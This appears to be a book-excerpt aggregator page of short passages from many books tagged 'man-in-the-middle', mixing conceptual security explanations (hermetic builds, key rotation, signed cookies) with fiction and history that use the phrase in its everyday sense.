Unauthenticated inputs Even if the user and build steps are trustworthy, most builds have dependencies on other artifacts. Any such dependency is a surface through which adversaries can potentially subvert the build. For example, if the build system fetches a dependency over HTTP without TLS, an attacker can perform a man-in-the-middle attack to modify the dependency in transit. For this reason, we recommend hermetic builds (see “Hermetic, Reproducible, or Verifiable?”). The build process should declare all inputs up front, and only the orchestrator should fetch those inputs. Hermetic builds give much higher confidence that the inputs listed in the provenance are correct.
…
Your environment may have other secrets that need attention, such as keys used for encryption of data at rest and cryptographic keys used for SSL. If your frontend web serving infrastructure is compromised or potentially accessible by an attacker, you may need to consider rotating your SSL keys. If you don’t take action after an attacker steals your keys, they might use the keys to perform a man-in-the-middle attack. Similarly, if the encryption key for records in your database is on a compromised database server, the safest path forward is to rotate the keys and reencrypt the data. Cryptographic keys are often used for application-level communications, as well. If the attacker had access to systems where such application-level keys are stored, you’ll want to rotate the keys.
DarkMarket: Cyberthieves, Cybercops and You by Misha Glenny
Berlin Wall, Bretton Woods, Brian Krebs, BRICs, call centre, Chelsea Manning, Fall of the Berlin Wall, illegal immigration, James Watt: steam engine, Julian Assange, military-industrial complex, MITM: man-in-the-middle, pirate software, Potemkin village, power law, reserve currency, Seymour Hersh, Silicon Valley, Skype, SQL injection, Stuxnet, urban sprawl, white flight, WikiLeaks, zero day
The characters at this conference live in a contemporary Wonderland where convention is oft disregarded – ponytails and wire-rimmed glasses earnestly exchange information with starched military uniforms about ‘SQL injection vulnerabilities’. Besuited civil servants are deep in conversation with young men in jeans and T-shirts detailing the iniquities of ‘man-in-the-middle attacks’. To grasp even the very basics of cyber security in its rich variety, one must be prepared to learn countless new idioms that are being constantly added to or amended. Otherwise you can listen to a conversation that in basic vocabulary and syntax structure is unmistakably English, but is nonetheless completely meaningless to those unschooled in the arcane language.
Boeing Versus Airbus: The Inside Story of the Greatest International Competition in Business by John Newhouse
Airbus A320, airline deregulation, Bay Area Rapid Transit, Boeing 747, Build a better mousetrap, corporate governance, demand response, high-speed rail, legacy carrier, low cost airline, MITM: man-in-the-middle, upwardly mobile
However, dropping the protectionist rules would require changes in domestic law, and Congress, if asked, was certain to refuse amending existing law unless other countries—notably Britain, France, Germany, and Japan—extended reciprocal benefits to the United States.7 To no one’s surprise, BA’s proposed merger with USAir churned up political turmoil. Two strong multistate lobbies formed up. One, belonging to BA-USAir, fought hard and resourcefully to maneuver approval of the deal. The other fought just as hard on behalf of the big three/fat four, and it held better cards. The man in the middle was Andrew Card, then secretary of transportation and until recently President George W. Bush’s chief of staff. Given the prohibition on foreign ownership, Card would have had to veto the deal if it appeared to transfer control of USAir to BA. However, BA was proposing to acquire 21 percent of the voting stock and one-fourth of the board membership.
We Are Never Meeting in Real Life by Samantha Irby
Affordable Care Act / Obamacare, cotton gin, MITM: man-in-the-middle, obamacare, off-the-grid, Recombinant DNA, rolodex, Rosa Parks, sensible shoes, Silicon Valley, Steve Jobs, white flight, Zipcar
At some point in the evening I would have to take you aside to explain that I was going to sell the children’s piano to fund the latest of my father’s harebrained schemes, but that he’d assured me that this one was going to be the one that finally paid back a return on my investment. There’d inevitably be a fight of some kind, resulting in your having to drive my sobbing mother home and my body-slamming an old-ass man in the middle of the TV room while your kids cower in fear in the kitchen. So I guess what I’m saying is that death can sometimes be pretty great. — I will have to keep your parents at arm’s length because yours is the kind of family that goes on extended vacations in the wilderness together, and I’m afraid that if they like me too much, they will expect me to go with, and I am doing no such thing.
The Perfect Storm: A True Story of Men Against the Sea by Sebastian Junger
Dava Sobel, fail fast, MITM: man-in-the-middle, North Sea oil, Tragedy of the Commons, urban renewal
Smith is one of their own, and they're going to get him one way or another. It's full dark when the first helicopter, zeroed-in by the marker buoy, arrives on-scene. There's no sign of Smith. The Coast Guard pilot who spotted him, debriefed back on-base, says the dye was fresh and he was "awful sure" there was a man in the middle of it. The seas were too rough to tell whether he swam to the life raft that was dropped to him, though. Three hours later one of the helicopter pilots radios that they've spotted Smith near the radio marker buoy. Another H-60 and tanker plane prepare to launch from Suffolk, but no sooner are those orders given than the pilot on-scene corrects himself: He didn't spot a person, he spotted a life raft.
The Children of the Sky by Vernor Vinge
air gap, combinatorial explosion, epigenetics, indoor plumbing, megacity, MITM: man-in-the-middle, power law, random walk, risk tolerance, technological singularity, the scientific method, Vernor Vinge
Radio has kept it a secret from all the packs who are using him.” “Hmm,” said Ravna. “I wonder if he’s smart enough to play Princess Pretending.” “Huh?” The word came from both Amdi and Jefri. After a moment Ritl chimed in with a mimic interrogative of her own. “Sorry.” She had violated her personal ban on Princesses. “Straumers call it a ‘Man in the Middle’ attack.” “Oh yeah,” said Amdi, “I thought of that. The problem is Vendacious has conditioned all the members to follow certain forwarding protocols. At best Mr. Radio is variably intelligent. From moment to moment, he may be smart enough for simultaneous lying. In between, he’ll drop the ball.”
…
There were likely two others fairly close, one that had been used for long-range relay to Fyr and one at the head of the chain to the Tropics. Right now the radio pack could easily be a fully-connected fivesome, perhaps even smarter than the night it had linked them with Amdi. Maybe such a pack couldn’t run a full Man-in-the-Middle, but all it had to do was not relay all it heard from here. If it was willing to risk its life.… She glanced at Jefri. He was as pale as he could be, stricken. He gave her a nod, understanding. Meantime, Zek still looked at them, intent. The creature had made a brave offer. Okay. Ravna nodded at him, and quietly asked something that might be innocuous even if it were relayed to listeners up and down Mr.
A Peace to End All Peace: The Fall of the Ottoman Empire and the Creation of the Modern Middle East by David Fromkin
anti-communist, British Empire, colonial rule, Khartoum Gordon, Khyber Pass, MITM: man-in-the-middle, Monroe Doctrine, Suez canal 1869, trade route
Archibald Wavell (later Field Marshal Earl Wavell), an officer who served under Allenby in the Palestine campaign, commenting on the treaties bringing the First World War to an end
CONTENTS
List of Illustrations and Maps; Photo Credits; Acknowledgments; A Note on Spelling; Introduction
PART I At the Crossroads of History: 1 THE LAST DAYS OF OLD EUROPE; 2 THE LEGACY OF THE GREAT GAME IN ASIA; 3 THE MIDDLE EAST BEFORE THE WAR; 4 THE YOUNG TURKS URGENTLY SEEK AN ALLY; 5 WINSTON CHURCHILL ON THE EVE OF WAR; 6 CHURCHILL SEIZES TURKEY'S WARSHIPS; 7 AN INTRIGUE AT THE SUBLIME PORTE
PART II Kitchener of Khartoum Looks Ahead: 8 KITCHENER TAKES COMMAND; 9 KITCHENER'S LIEUTENANTS; 10 KITCHENER SETS OUT TO CAPTURE ISLAM; 11 INDIA PROTESTS; 12 THE MAN IN THE MIDDLE
PART III Britain is Drawn into the Middle Eastern Quagmire: 13 THE TURKISH COMMANDERS ALMOST LOSE THE WAR; 14 KITCHENER ALLOWS BRITAIN TO ATTACK TURKEY; 15 ON TO VICTORY AT THE DARDANELLES; 16 RUSSIA'S GRAB FOR TURKEY; 17 DEFINING BRITAIN'S GOALS IN THE MIDDLE EAST; 18 AT THE NARROWS OF FORTUNE; 19 THE WARRIORS; 20 THE POLITICIANS; 21 THE LIGHT THAT FAILED; 22 CREATING THE ARAB BUREAU; 23 MAKING PROMISES TO THE ARABS; 24 MAKING PROMISES TO THE EUROPEAN ALLIES; 25 TURKEY'S TRIUMPH AT THE TIGRIS
PART IV Subversion: 26 BEHIND ENEMY LINES; 27 KITCHENER'S LAST MISSION; 28 HUSSEIN'S REVOLT
PART V The Allies at the Nadir of Their Fortunes: 29 THE FALL OF THE ALLIED GOVERNMENTS: BRITAIN AND FRANCE; 30 THE OVERTHROW OF THE CZAR
PART VI New Worlds and Promised Lands: 31 THE NEW WORLD; 32 LLOYD GEORGE'S ZIONISM; 33 TOWARD THE BALFOUR DECLARATION; 34 THE PROMISED LAND
PART VII Invading the Middle East: 35 JERUSALEM FOR CHRISTMAS; 36 THE ROAD TO DAMASCUS; 37 THE BATTLE FOR SYRIA
PART VIII The Spoils of Victory: 38 THE PARTING OF THE WAYS; 39 BY THE SHORES OF TROY
PART IX The Tide Goes Out: 40 THE TICKING CLOCK; 41 BETRAYAL; 42 THE UNREAL WORLD OF THE PEACE CONFERENCES
PART X Storm over Asia: 43 THE TROUBLES BEGIN: 1919—1921; 44 EGYPT: THE WINTER OF 1918—1919; 45 AFGHANISTAN: THE SPRING OF 1919; 46 ARABIA: THE SPRING OF 1919; 47 TURKEY: JANUARY 1920; 48 SYRIA AND LEBANON: THE SPRING AND SUMMER OF 1920; 49 EASTERN PALESTINE (TRANSJORDAN): 1920; 50 PALESTINE—ARABS AND JEWS: 1920; 51 MESOPOTAMIA (IRAQ): 1920; 52 PERSIA (IRAN): 1920
PART XI Russia Returns to the Middle East: 53 UNMASKING BRITAIN'S ENEMIES; 54 THE SOVIET CHALLENGE IN THE MIDDLE EAST; 55 MOSCOW'S GOALS; 56 A DEATH IN BUKHARA
PART XII The Middle Eastern Settlement of 1922: 57 WINSTON CHURCHILL TAKES CHARGE; 58 CHURCHILL AND THE QUESTION OF PALESTINE; 59 THE ALLIANCES COME APART; 60 A GREEK TRAGEDY; 61 THE SETTLEMENT OF THE MIDDLE EASTERN QUESTION
Notes; Bibliography; Index
LIST OF ILLUSTRATIONS AND MAPS: 1 Lord Kitchener; 2 Sir Mark Sykes; 3 Enver; 4 Talaat; 5 Djemal; 6 Crowds gather outside the Sublime Porte, 1913; 7 Turkish soldiers at Dardanelles fort, 1915; 8 Allied fleet at entrance to Dardanelles; 9 Pictorial map of the Dardanelles; 10 H.M.S.
…
As the war progressed, British officials who ruled India increasingly came to believe that their most dangerous adversaries were neither the Turks nor the Germans, but the British officials governing Egypt; for despite India's protests, British Cairo went ahead with its intrigues in Mecca.
12 THE MAN IN THE MIDDLE
i
Mecca, where Mohammed was born, and Medina, to which he emigrated, are the holy cities that for Moslems everywhere give unique importance to the mountainous Hejaz, the long and narrow western section of the Arabian peninsula bordering the Red Sea. Hejaz means "separating"—a reference to the highlands that divide it from the plateau to the east.
Digital Bank: Strategies for Launching or Becoming a Digital Bank by Chris Skinner
algorithmic trading, AltaVista, Amazon Web Services, Any sufficiently advanced technology is indistinguishable from magic, augmented reality, bank run, Basel III, bitcoin, Bitcoin Ponzi scheme, business cycle, business intelligence, business process, business process outsourcing, buy and hold, call centre, cashless society, clean water, cloud computing, corporate social responsibility, credit crunch, cross-border payments, crowdsourcing, cryptocurrency, demand response, disintermediation, don't be evil, en.wikipedia.org, fault tolerance, fiat currency, financial innovation, gamification, Google Glasses, high net worth, informal economy, information security, Infrastructure as a Service, Internet of things, Jeff Bezos, Kevin Kelly, Kickstarter, M-Pesa, margin call, mass affluent, MITM: man-in-the-middle, mobile money, Mohammed Bouazizi, new economy, Northern Rock, Occupy movement, Pingit, platform as a service, Ponzi scheme, prediction markets, pre–internet, QR code, quantitative easing, ransomware, reserve currency, RFID, Salesforce, Satoshi Nakamoto, Silicon Valley, smart cities, social intelligence, software as a service, Steve Jobs, strong AI, Stuxnet, the long tail, trade route, unbanked and underbanked, underbanked, upwardly mobile, vertical integration, We are the 99%, web application, WikiLeaks, Y2K
A good example is the coordinated ZeuS malware attack in Q4 2010, where a web application supposedly from the bank asks the victim to input their mobile phone number. The victim is then asked via text message to install an application onto the phone and the application is used to intercept any text messages the victim sends thereafter. There is also a whole load of new man-in-the-middle and mobile malware attacks that are growing by the day such as a recent Facebook update about Justin Bieber, which resulted in over 100,000 in 24 hours with 27% via mobile Facebook. Every viewing downloaded malware. Then there is mobile hi-jacking, where you think you are on your mobile carrier’s network but you’re not.
Fearsome Particles by Trevor Cole
call centre, clean water, Khartoum Gordon, late fees, microplastics / micro fibres, MITM: man-in-the-middle
“He’s just going to be a minute.” Gerald turned and saw three people in line behind him. “It’ll just be a minute,” he repeated. “What are we waiting for?” said a wind-breakered woman at the end. “Some jerk gone to his car,” said a middle-aged farmer-type behind Gerald. A brokerish-looking man in the middle looked at the ceiling and sighed. “This is ridiculous,” said the woman. Gerald began to feel hot, and a little damp. He wanted to take off the jacket of his suit but he feared these people would mistake the movement for some sort of capitulation, and he had given the obese man his word. “He was in line before us,” said Gerald, addressing the queue.
The Quantum Thief by Hannu Rajaniemi
augmented reality, cognitive dissonance, deep learning, gravity well, haute couture, MITM: man-in-the-middle, music of the spheres, quantum entanglement
There are loops in it, places where a node – representing a memory, an event, a person – has more than one parent. That means that sometimes, sharing gevulot about an innocuous memory, a taste or an intimate moment, can unlock whole swathes of a person’s exomemory. The gogol pirates have software that tries to map out a person’s gevulot tree, tries to scan for the key nodes in conversation. There is a man-in-the-middle attack software that attempts to intercept the quantum communications between a Watch and the exomemory. That will require a lot more brute force, and quantum computation capability besides: I will have to talk to Perhonen about that. A perfect emulation of the privacy sense organ which I want to start running immediately.
Cyber War: The Next Threat to National Security and What to Do About It by Richard A. Clarke, Robert Knake
air gap, barriers to entry, complexity theory, data acquisition, Dr. Strangelove, escalation ladder, Golden arches theory, Herman Kahn, information security, Just-in-time delivery, launch on warning, military-industrial complex, MITM: man-in-the-middle, nuclear winter, off-the-grid, packet switching, RAND corporation, Robert Hanssen: Double agent, Ronald Reagan, Seymour Hersh, Silicon Valley, smart grid, South China Sea, Steve Jobs, systems thinking, Timothy McVeigh, trade route, undersea cable, Y2K, zero day
The standard Ethernet protocol tells your computer to ignore everything that is not addressed to it, but that doesn’t mean it has to. An advanced packet sniffer on an Ethernet network can look at all the traffic. Your neighbors could sniff everything on the Internet on your street. More advanced sniffers can trick the network in what is known as a “man-in-the-middle” attack. The sniffer appears to the router as the user’s computer. All information is sent to the sniffer, which then copies the information before passing it on to the real addressee. Many (but not most) websites now use a secure, encrypted connection when you log on so that your password is not sent in the clear for anyone sniffing around to pick up.
Black Code: Inside the Battle for Cyberspace by Ronald J. Deibert
4chan, air gap, Any sufficiently advanced technology is indistinguishable from magic, Brian Krebs, call centre, citizen journalism, Citizen Lab, cloud computing, connected car, corporate social responsibility, crowdsourcing, cuban missile crisis, data acquisition, digital divide, disinformation, end-to-end encryption, escalation ladder, Evgeny Morozov, failed state, Firefox, Gabriella Coleman, global supply chain, global village, Google Hangouts, Hacker Ethic, Herman Kahn, informal economy, information security, invention of writing, Iridium satellite, jimmy wales, John Gilmore, John Markoff, Kibera, Kickstarter, knowledge economy, Lewis Mumford, low earth orbit, Marshall McLuhan, military-industrial complex, MITM: man-in-the-middle, mobile money, mutually assured destruction, Naomi Klein, new economy, Occupy movement, off-the-grid, Panopticon Jeremy Bentham, planetary scale, rent-seeking, Ronald Reagan, Ronald Reagan: Tear down this wall, Silicon Valley, Silicon Valley startup, Skype, smart grid, South China Sea, Steven Levy, Streisand effect, Stuxnet, Ted Kaczynski, the medium is the message, Turing test, Twitter Arab Spring, undersea cable, unit 8200, We are Anonymous. We are Legion, WikiLeaks, Yochai Benkler, zero day
See also Citizen Lab, “Planet Blue Coat: Mapping Censorship and Surveillance Tools,” January 15, 2013, https://citizenlab.org/planetbluecoat.
4 the website of Al-Manar: Citizen Lab documented the hosting of Hezbullah and Syrian government websites on servers based in Canada in “The Canadian Connection: An Investigation of Syrian Government and Hezbullah Web Hosting in Canada,” November 17, 2011, http://citizenlab.org/wp-content/uploads/2011/11/canadian_connection.pdf; and “The Canadian Connection: One Year Later,” November 14, 2012, https://citizenlab.org/2012/11/the-canadian-connection-one-year-later/.
5 reports from inside Syria of phishing attacks: On phishing attacks around the Syrian conflict, see Eva Galperin and Morgan Marquis-Boire, “Syrian Activists Targeted with Facebook Phishing Attack,” Electronic Frontier Foundation, March 29, 2012, https://www.eff.org/deeplinks/2012/03/pro-syrian-government-hackers-target-syrian-activists-facebook-phishing-attack; and Eva Galperin and Morgan Marquis-Boire, “New Wave of Facebook Phishing Attacks Targets Syrian Activists,” Electronic Frontier Foundation, April 24, 2012, https://www.eff.org/deeplinks/2012/04/new-wave-facebook-phishing-attacks-targets-syrian-activists. See also Peter Eckersley, “A Syrian Man-In-The-Middle Attack Against Facebook,” Electronic Frontier Foundation, May 5, 2011, https://www.eff.org/deeplinks/2011/05/syrian-man-middle-against-facebook; and Jennifer Preston, “Seeking to Disrupt Protesters, Syria Cracks Down on Social Media,” New York Times, March 23, 2011, http://www.nytimes.com/2011/05/23/world/middleeast/23facebook.html?
Wait: The Art and Science of Delay by Frank Partnoy
algorithmic trading, Atul Gawande, behavioural economics, Bernie Madoff, Black Swan, blood diamond, Cass Sunstein, Checklist Manifesto, cognitive bias, collapse of Lehman Brothers, collateralized debt obligation, computerized trading, corporate governance, cotton gin, Daniel Kahneman / Amos Tversky, delayed gratification, Flash crash, Frederick Winslow Taylor, George Akerlof, Google Earth, Hernando de Soto, High speed trading, impulse control, income inequality, information asymmetry, Isaac Newton, Long Term Capital Management, Menlo Park, mental accounting, meta-analysis, MITM: man-in-the-middle, Nick Leeson, paper trading, Paul Graham, payday loans, Pershing Square Capital Management, Ralph Nader, Richard Thaler, risk tolerance, Robert Shiller, Ronald Reagan, Saturday Night Live, scientific management, six sigma, social discount rate, Spread Networks laid a new fibre optics cable between New York and Chicago, Stanford marshmallow experiment, statistical model, Steve Jobs, systems thinking, The Market for Lemons, the scientific method, The Wealth of Nations by Adam Smith, upwardly mobile, Walter Mischel, work culture
., huge volumes of data that we’ve been collecting and validating on thousands of other couples for more than thirty years.”35 It turns out that a doctor glancing at a photograph of a black patient and a student watching a two-second video of a teacher are performing similar tasks. So is a young American woman looking at images of terrorist cells in the Middle East, or a young man in the Middle East looking at images of ostentatious wealth in America. Or any number of people everywhere who judge others based on first impressions. When we thin-slice, we reach powerful unconscious conclusions about others in seconds. Unfortunately, they are often wrong. Fortunately, they can be consciously unwound.
The Burning Land by George Alagiah
"World Economic Forum" Davos, fear of failure, gentrification, land reform, MITM: man-in-the-middle, Nelson Mandela, out of africa, pre–internet, urban decay, white flight, éminence grise
‘You think this is Motlantshe? You think he can do all these deals on his own and just keep the money to himself?’ Patel turned the engine off. ‘Ms Seaton, you need to know this whole stinking business goes all the way to the top. Those chaps in Pretoria are getting their cut. Motlantshe is just the deal-maker, the man in the middle.’ ‘But the figures are all published.’ ‘Oh, yes, they publish the figures they want you to see. The government got all these farms around here for nothing. Why didn’t the farmers shout and scream, eh?’ ‘You tell me.’ ‘Because our friend Motlantshe went round afterwards and paid them off.’
The Icon Thief by Alec Nevala-Lee
fixed-gear, index card, MITM: man-in-the-middle
Aside from the three men on the couch, the sales floor was deserted. As they approached the Armenians, Ilya saw that the two on either side were barely out of high school, while the third seemed in his late twenties. When the two groups were close enough, Sharkovsky came forward, met by the man in the middle, and they shook hands twice, first the right, then the left. Standing back, Sharkovsky studied the younger man. “How is your grandfather, Arshak?” Arshak made a noncommittal gesture. “Are we here to talk, or to do business?” Sharkovsky did not seem troubled by this show of impatience. “Business, if you like.
Chaos Engineering: System Resiliency in Practice by Casey Rosenthal, Nora Jones
Amazon Web Services, Asilomar, autonomous vehicles, barriers to entry, blockchain, business continuity plan, business intelligence, business logic, business process, cloud computing, cognitive load, complexity theory, continuous integration, cyber-physical system, database schema, DevOps, fail fast, fault tolerance, hindsight bias, human-factors engineering, information security, Kanban, Kubernetes, leftpad, linear programming, loose coupling, microservices, MITM: man-in-the-middle, no silver bullet, node package manager, operational security, OSI model, pull request, ransomware, risk tolerance, scientific management, Silicon Valley, six sigma, Skype, software as a service, statistical model, systems thinking, the scientific method, value engineering, WebSocket
There is a probe effect in taking the measurements, and another in the layer of the system in order to inject a fault or other variable. Consider a software system where you want to perform some chaos experiments deep in the Linux kernel on some kind of low-latency IO interface. You wire up a piece of software somewhere in the “signal path” of the IO interface to give yourself a man-in-the-middle. On the output you want to flip some bits so that any upstream application depending on this interface is affected by your chaos probe, but you don’t want it to be active all the time, so you need to be able to turn it on and off. In the naive case you’ve stuck yourself in the middle. Now for every bit that goes out this interface you’ve inserted a conditional, “Am I running a chaos experiment right now or not?”
Reaper Force: The Inside Story of Britain’s Drone Wars by Dr Peter Lee
crew resource management, Daniel Kahneman / Amos Tversky, digital map, illegal immigration, job satisfaction, MITM: man-in-the-middle, no-fly zone, operational security, QWERTY keyboard, Skype
He often had a child in the car, travelling around with him. We were flying a very tight orbit to make sure we never lost sight of the car, and always knew who was or wasn’t in it. This time the child wasn’t. The man drove off. Once we were established in an appropriate kill zone then that was it: a moving HVT was my first shot. It wasn’t an armed man in the middle of a field with more fields all around. It was reasonably high pressured – in my mind, anyway. Every time will feel something like that, but there is more pressure on you the first time. My heart has never gone so fast. I’ve done a lot of silly things in my time that have raised my heart rate quite considerably, but not like this.
Freezing Order: A True Story of Money Laundering, Murder, and Surviving Vladimir Putin's Wrath by Bill Browder
"World Economic Forum" Davos, 3D printing, activist lawyer, Bellingcat, Berlin Wall, Bernie Madoff, bitcoin, Boris Johnson, Clive Stafford Smith, crowdsourcing, disinformation, Donald Trump, estate planning, fake news, MITM: man-in-the-middle, Nelson Mandela, Ponzi scheme, power law, Robert Bork, Ronald Reagan, Seymour Hersh, Silicon Valley, Skype, Steve Bannon
But guess who the Interior Ministry put on it?” “No idea.” Vadim grabbed a DVD, came around to my desk, and popped it into my computer. It was a video of a TV report on the Mikhailovsky GOK investigation he’d found online. He paused on a scene showing three young men hunkered over a pile of binders and paperwork. Vadim pointed to the man in the middle. “Recognize him?” I leaned closer. The man was looking down and I could only make out the top of his head, but his haircut was unmistakable. “That’s Karpov!” This was the same high-spending Interior Ministry officer involved in the $230 million fraud. “Yep. And check this out.”
Pavel Karpov (center on screen). (© HERMITAGE)
Vadim laid out two spreadsheets—travel records for Klyuev and Karpov.
A New History of the Future in 100 Objects: A Fiction by Adrian Hon
Adrian Hon, air gap, Anthropocene, augmented reality, blockchain, bounce rate, call centre, carbon credits, carbon tax, Cepheid variable, charter city, Clayton Christensen, clean water, cognitive dissonance, congestion charging, creative destruction, CRISPR, crowdsourcing, cryptocurrency, deepfake, defense in depth, discrete time, disinformation, disintermediation, driverless car, drone strike, food desert, game design, gamification, gravity well, hive mind, hydroponic farming, impulse control, income inequality, job automation, Kickstarter, Kim Stanley Robinson, knowledge worker, life extension, lifelogging, low earth orbit, machine translation, MITM: man-in-the-middle, moral panic, Neal Stephenson, no-fly zone, off grid, offshore financial centre, oil shale / tar sands, orbital mechanics / astrodynamics, peak oil, peer-to-peer, phenotype, planned obsolescence, post scarcity, precariat, precautionary principle, prediction markets, rewilding, Silicon Valley, skeuomorphism, Skype, smart contracts, social graph, South Sea Bubble, speech recognition, stem cell, Stewart Brand, synthetic biology, technoutopianism, telepresence, transfer pricing, tulip mania, Turing test, urban sprawl, Vernor Vinge, VTOL, working-age population
Some adherents use a ceremonial hammer to smash a replica of an ancient spinning hard disk to commemorate the loss and the opportunity for growth.
PHYSICAL SYNC
This ritual grew out of the entirely practical requirement for security-conscious groups to swap their cryptographic “public keys” in person to prevent impersonation or man-in-the-middle attacks. These groups included distributed amplified teams, which took advantage of the physical proximity to become familiar with one another and to establish emotional trust through intense experiences. These could include extreme physical sports, group meditation, mutual grooming, and dancing.
Node.js in Action by Mike Cantelon, Marc Harter, Tj Holowaychuk, Nathan Rajlich
Amazon Web Services, business logic, Chris Wanstrath, create, read, update, delete, Debian, en.wikipedia.org, Firefox, Google Chrome, machine readable, MITM: man-in-the-middle, MVC pattern, node package manager, p-value, pull request, Ruby on Rails, SQL injection, web application, WebSocket
You’ll see that both cookies are available as properties of req.cookies:
$ curl http://localhost:3000/ -H "Cookie: foo=bar, bar=baz"
{ foo: 'bar', bar: 'baz' }
{}
Signed cookies
Signed cookies are better suited for sensitive data, as the integrity of the cookie data can be verified, helping to prevent man-in-the-middle attacks. Signed cookies are placed in the req.signedCookies object when valid. The reasoning behind having two separate objects is that it shows the developer’s intention. If you were to place both signed and unsigned cookies in the same object, a regular cookie could be crafted to contain data to mimic a signed cookie.
Fuller Memorandum by Stross, Charles
Any sufficiently advanced technology is indistinguishable from magic, Beeching cuts, Bletchley Park, British Empire, carbon credits, cognitive dissonance, complexity theory, congestion charging, Crossrail, death from overwork, dumpster diving, escalation ladder, false flag, finite state, Firefox, Herman Kahn, HyperCard, invisible hand, land reform, linear programming, messenger bag, MITM: man-in-the-middle, operational security, peak oil, Plato's cave, post-work, prosperity theology / prosperity gospel / gospel of success, quantum entanglement, reality distortion field, security theater, sensible shoes, side project, Sloane Ranger, telemarketer, Turing machine
It's not her fault she doesn't know where the dividing line between IT support scut-work and OPSEC protocol lies, although she catches on fast when I explain the predilection of class G3 abominations for traveling down Cat 5e cables and eating clerical staff, not to say anything about the ease with which a bad guy could stick a network sniffer on our backbone and do a man-in-the-middle attack on our authentication server if we let random cable installers loose under the floor tiles in the new building. Finally she leaves me alone, and I open the cover on BLOODY BARON and start reading. AN HOUR AND A HALF LATER I'M THOROUGHLY SPOOKED BY MY reading--so much so that I've had to put the file down a couple of times when I caught myself scanning the same sentence over and over again with increasing disbelief.
Blood and Oil: Mohammed Bin Salman's Ruthless Quest for Global Power by Bradley Hope, Justin Scheck
"World Economic Forum" Davos, augmented reality, Ayatollah Khomeini, Boston Dynamics, clean water, coronavirus, distributed generation, Donald Trump, Downton Abbey, Elon Musk, Exxon Valdez, financial engineering, Google Earth, high net worth, Jeff Bezos, Marc Andreessen, Mark Zuckerberg, Masayoshi Son, megaproject, MITM: man-in-the-middle, new economy, NSO Group, Peter Thiel, public intellectual, ride hailing / ride sharing, Sand Hill Road, Silicon Valley, SoftBank, South of Market, San Francisco, sovereign wealth fund, starchitect, Steve Bannon, Steve Jobs, tech billionaire, Tim Cook: Apple, trade route, traumatic brain injury, Travis Kalanick, Uber for X, urban planning, Virgin Galactic, Vision Fund, WeWork, women in the workforce, young professional, zero day
Wearing an open-necked shirt, Mohammed referred to advances in medicine that could make it possible for NEOM residents to live much longer than anyone in history. He might live hundreds of years, he said, explaining that he’d already begun investing in longevity research. One guest was unnerved: Did he think he would be ruler of Saudi Arabia until he was in his three hundreds? Was this the most powerful man in the Middle East?
Chapter 18 Cold Blood
October 2, 2018
As Jamal Khashoggi landed in Istanbul just before 4 a.m., the fifteen-man kill team was already getting into place. Zipping through customs, Khashoggi made his way to his new apartment in Zeytinburnu, on the European side of the city.
Silence on the Wire: A Field Guide to Passive Reconnaissance and Indirect Attacks by Michal Zalewski
active measures, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, AltaVista, Charles Babbage, complexity theory, dark matter, data acquisition, Donald Knuth, fault tolerance, information security, MITM: man-in-the-middle, NP-complete, OSI model, Silicon Valley, speech recognition, Turing complete, Turing machine, Vannevar Bush
[2] A number that is coprime to x (also called relatively prime to x) shares no common factors with x, other than 1 and −1. (Their greatest common divisor is 1.)
[3] For the sake of completeness, it should be noted that ad hoc public key cryptography is, among other things, vulnerable to “man in the middle” attacks, where an attacker impersonates one of the endpoints and provides its own, fake public key, in order to be able to intercept communications. To prevent such attacks, additional means of verifying the authenticity of a key must be devised, either by arranging a secure exchange or establishing a central authority to issue or certify keys (public key infrastructure, PKI).
Docker in Action by Jeff Nickoloff, Stephen Kuenzli
air gap, Amazon Web Services, cloud computing, computer vision, continuous integration, database schema, Debian, end-to-end encryption, exponential backoff, fail fast, failed state, information security, Kubernetes, microservices, MITM: man-in-the-middle, peer-to-peer, software as a service, web application
This makes access-control requirements one of the least flexible and most important to consider.
Integrity
Artifact integrity and confidentiality both fall in the less-flexible and more-technical end of the spectrum. Artifact integrity is trustworthiness and consistency of your files and images. Violations of integrity may include man-in-the-middle attacks, in which an attacker intercepts your image downloads and replaces the content with their own. They might also include malicious or hacked registries that lie about the payloads they return.
Confidentiality
Artifact confidentiality is a common requirement for companies developing trade secrets or proprietary software.
Six Degrees: The Science of a Connected Age by Duncan J. Watts
AOL-Time Warner, Berlin Wall, Bretton Woods, business process, corporate governance, Drosophila, Erdős number, experimental subject, fixed income, Frank Gehry, Geoffrey West, Santa Fe Institute, independent contractor, industrial cluster, invisible hand, it's over 9,000, Long Term Capital Management, market bubble, Milgram experiment, MITM: man-in-the-middle, Murray Gell-Mann, Network effects, new economy, Norbert Wiener, PalmPilot, Paul Erdős, peer-to-peer, power law, public intellectual, rolodex, Ronald Coase, Savings and loan crisis, scientific worldview, Silicon Valley, social contagion, social distancing, Stuart Kauffman, supply-chain management, The Nature of the Firm, the strength of weak ties, The Wealth of Nations by Adam Smith, Toyota Production System, Tragedy of the Commons, transaction costs, transcontinental railway, vertical integration, Vilfredo Pareto, Y2K
The result, a program they nicknamed Napster, became an overnight phenomenon, attracting tens of millions of users and the ire of the entire recording industry, and throwing Fanning into the midst of a worldwide commercial, legal, and ethical maelstrom. At least for a while, Fanning was the man in the middle, lionized by some and demonized by others, quoted in business papers and pictured on magazine covers. Before finally being forced to charge fees for its music-sharing services, Napster (now largely defunct) and Fanning had succeeded in striking a deal with the global publishing giant Bertelsmann.
Wireless by Charles Stross
air gap, anthropic principle, back-to-the-land, Benoit Mandelbrot, Buckminster Fuller, Cepheid variable, cognitive dissonance, colonial exploitation, cosmic microwave background, Easter island, epigenetics, finite state, Georg Cantor, gravity well, hive mind, hydroponic farming, jitney, Khyber Pass, Late Heavy Bombardment, launch on warning, lifelogging, Magellanic Cloud, mandelbrot fractal, MITM: man-in-the-middle, Neil Armstrong, peak oil, phenotype, Pluto: dwarf planet, security theater, sensible shoes, Turing machine, undersea cable
“Running late,” he pants, kicking at the pigeons until they flap away to make space for him at the other end of the bench. “Really?” Brundle nods. “They should be coming over the horizon in another five minutes.” “How did you engineer it?” Gregor isn’t particularly interested, but technical chitchat serves to pass the remaining seconds. “Man-in-the-middle, ramified by all their intelligence assessments.” Brundle looks self-satisfied. “Understanding their caste specialization makes it easier. Two weeks ago we told the GRU that MacNamara was using the NP-101 program as cover for a preemptive D-SLAM strike. At the same time we got the NOAA to increase their mapping-launch frequency, and pointed the increased level of Soviet activity out to our sources in SAC.
The Forever War by Dexter Filkins
animal electricity, friendly fire, Khyber Pass, MITM: man-in-the-middle, Thomas L Friedman
